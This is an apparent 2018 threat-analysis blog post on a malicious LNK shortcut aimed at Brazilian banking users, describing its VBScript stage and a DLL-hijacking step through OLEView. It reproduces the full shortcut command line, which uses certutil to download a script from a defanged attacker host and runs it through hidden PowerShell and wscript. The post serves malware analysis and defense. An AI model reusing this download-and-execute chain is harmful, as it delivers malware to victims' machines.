Tuesday, 12 June 2018

LNK Files targeting Banking Users in Brazil

On June 8th 2018, I found an interesting instance of a LNK file which was used to target Banking users in the Brazil region.

ZIP File Hash: e8cf34e5b319769da611441cfee9f6f5
Filename: 001745-Tabela-Preco-Fipe.lnk
MD5 hash: ea31baebb8b99ddd858865098e704521

The LNK file has the Target set as shown below:

C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f "hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs" %temp%\pls.vbs && cd %temp% && rename "pls.vbs" "NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs && powershell.exe -WindowStyleHidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

The above command line performs the following main operations:

1. Downloads a VBScript from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs. The file download and drop is performed using certutil.

2. Renames the dropped VBScript from pls.vbs to NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

3. Executes the VBScript using wscript which is invoked by powershell.exe

Analysis of the VBScript

Since the attack is targeted towards Brazilian Banking Users,  several checks are performed by the VBScript before continuing the execution.

Checks for the presence of following directories on the File System:

%PROGRAMFILES%\Diebold
%PROGRAMFILES%\AppBrad
%APPDATA%\..\Local\Aplicativo Itau
C:\Sicoobnet

If any of the above paths do not exist on the machine, then VBScript will terminate the execution.

If the above checks are passed, then it continues to perform the following main actions:

1. Downloads a ZIP file from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/iWaPZOE.zip
2. Extracts the contents of the ZIP file to %temp% directory.
3. Renames the executable from iWaPZOE.exe to a randomly generated name. The DLL file is renamed from: RrpzTAc.dll to IVIEWERS.dll
4. Executes the downloaded binary.

DLL Hijacking

The downloaded binary is an OLEView application and the DLL with the name, IVIEWERS.dll is used to perform DLL hijacking. During runtime, IVIEWERS.dll is dynamically loaded by OLEView application. Since the downloaded version of IVIEWERS.dll is malicious, it results in DLL hijacking.

I'll post more details of the malicious activities performed by the DLL in a follow up post.

c0d3inj3cT

No comments:

Post a Comment